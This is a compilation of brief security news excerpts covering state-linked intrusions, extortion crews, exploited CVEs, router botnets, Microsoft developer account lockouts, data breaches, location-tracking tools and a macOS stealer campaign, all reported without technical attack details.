Iran intruders disrupting US water, energy facilities • The Register - “These PLCs were deployed across multiple US critical infrastructure sectors within a wide variety of industrial automation processes … Some of the victims experienced operational disruption and financial loss,” it continued. It’s also worth noting that the energy and utilities sector was the fifth-most targeted industry in the US last month, according to Check Point’s cyberattack tracking.
‘Several dozen’ orgs targeted by a new extortion crew • The Register - UNC6783 primarily compromises call centers and business process outsourcers (BPOs) that work with larger companies. Once the criminals have access to the BPOs’ networks, they can use stolen legitimate credentials from BPO employees to break into their customers’ IT environments.
Last week, International Cyber Digest reported that Adobe was allegedly breached by an attacker calling themselves Mr. Raccoon, who reportedly gained access through an Indian BPO by first deploying a remote access tool on one employee and then phishing that worker’s manager.
The data thief claimed to have stolen 13 million support tickets with personal data, 15,000 employee records, all HackerOne submissions, internal documents, and other information. Google: New UNC6783 hackers steal corporate Zendesk support tickets
Ransomware scum, other crims exploit 4 old Microsoft bugs • The Register - CVE’s:
- 2012-1854
- 2023-21529
- 2023-36424
- 2025-60710
Thousands of consumer routers hacked by Russia’s military - Ars Technica - An estimated 18,000 to 40,000 consumer routers, mostly those made by MikroTik and TP-Link, located in 120 countries, were wrangled into infrastructure belonging to APT28, an advanced threat group that’s part of Russia’s military intelligence agency known as the GRU, researchers from Lumen Technologies’ Black Lotus Labs said. The easiest way for people to know if their router has been compromised in the operation is to review the current DNS settings to see if they list unrecognized servers. Users should also check event logs for any unrecognized changes to DNS server settings. People should also strongly consider replacing end-of-life routers with ones that receive regular security updates. People should never click through browser alerts warning of untrusted TLS certificates.
Developer of VeraCrypt encryption software says Windows users may face boot-up issues after Microsoft locked his account | TechCrunch - The developer of the popular file encryption software VeraCrypt says Microsoft has blocked access to the account he used for sending updates to Windows users, and warned that anyone who encrypts their PCs with his software may soon face issues accessing their computers.
WireGuard VPN developer can’t ship software updates after Microsoft locks account | TechCrunch - Jason Donenfeld, the creator of the open source WireGuard VPN software, told TechCrunch that he has been locked out of his Microsoft developer account, and as a result cannot sign drivers or ship updates for WireGuard for Windows users, which are critical for its software to run. Donenfeld said in a post on X on Wednesday that the account termination stopped a WireGuard update from shipping.
Windscribe, a maker of VPN and other consumer privacy tools, said in a post on X that it had also been locked out of its Partner Center account. The company said it had a verified account for over eight years in order to sign its drivers.
Hacker stole £700,000 from UK energy company by redirecting payment | TechCrunch - British oil and gas company Zephyr Energy says someone stole £700,000 (close to $1 million) from one of its U.S.-based subsidiaries by redirecting a payment meant for a contractor into a hacker-controlled account.
France to ditch Windows for Linux to reduce reliance on US tech | TechCrunch In a statement, French minister David Amiel said (translated) that the effort was to “regain control of our digital destiny” by relying less on U.S. tech companies. Amiel said that the French government can no longer accept that it doesn’t have control over its data and digital infrastructure.
Booking.com confirms hackers accessed customers’ data | TechCrunch - The user who posted the notification on Reddit told TechCrunch that they received a phishing message via WhatsApp two weeks ago that included “booking details and personal information.” That suggests hackers are leveraging the stolen information to target Booking.com customers.
Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure - Sysdig said it observed the first exploitation attempt targeting the vulnerability within 9 hours and 41 minutes of it being publicly disclosed, with a credential theft operation executed in minutes, despite there being no proof-of-concept (PoC) code available at the time.
Citizen Lab: Law Enforcement Used Webloc to Track 500 Million Devices via Ad Data - Customers of the tool can use it to monitor the location, movements, and personal characteristics of entire populations up to three years in the past. According to information available on Penlink’s website, Webloc can be used for “investigating and interpreting location-based data to support your cases.” Webloc also has the capability to infer location from IP addresses and identify the persons behind the devices by gathering their home addresses and workplaces.
U.S. customers of the Webloc include Immigration and Customs Enforcement (ICE), the U.S. military, Texas Department of Public Safety, DHS West Virginia, NYC district attorneys, and various police departments in Los Angeles, Dallas, Baltimore, Tucson, Durham, and in smaller cities and counties like the City of Elk Grove and Pinal County.
New macOS stealer campaign uses Script Editor in ClickFix attack - In a new campaign distributing Atomic Stealer observed by security researchers at Jamf, the hackers target victims with fake Apple-themed sites that pose as guides to help reclaim disk space on their Mac computers. These pages contain legitimate-looking system cleanup instructions but use the applescript:// URL scheme to launch Script Editor with a pre-filled executable code.
FBI Extracts Suspect’s Deleted Signal Messages Saved in iPhone Notification Database - “Messages were recovered from Sharp’s phone through Apple’s internal notification storage—Signal had been removed, but incoming notifications were preserved in internal memory. Only incoming messages were captured (no outgoing).”
Google, Microsoft, Meta All Tracking You Even When You Opt Out, According to an Independent Audit - Each company disputed or took issue with the research, with Google saying it was based on a “fundamental misunderstanding” of how its product works. webXray is an independent technology company that runs a search engine that lets people look for privacy violations on the internet. Its founder Timothy Libert is the former lead of cookie policy and compliance at Google. Libert told 404 Media he felt his job at Google was to protect its users but that his bosses didn’t agree. He left the company in 2023 and started webXray.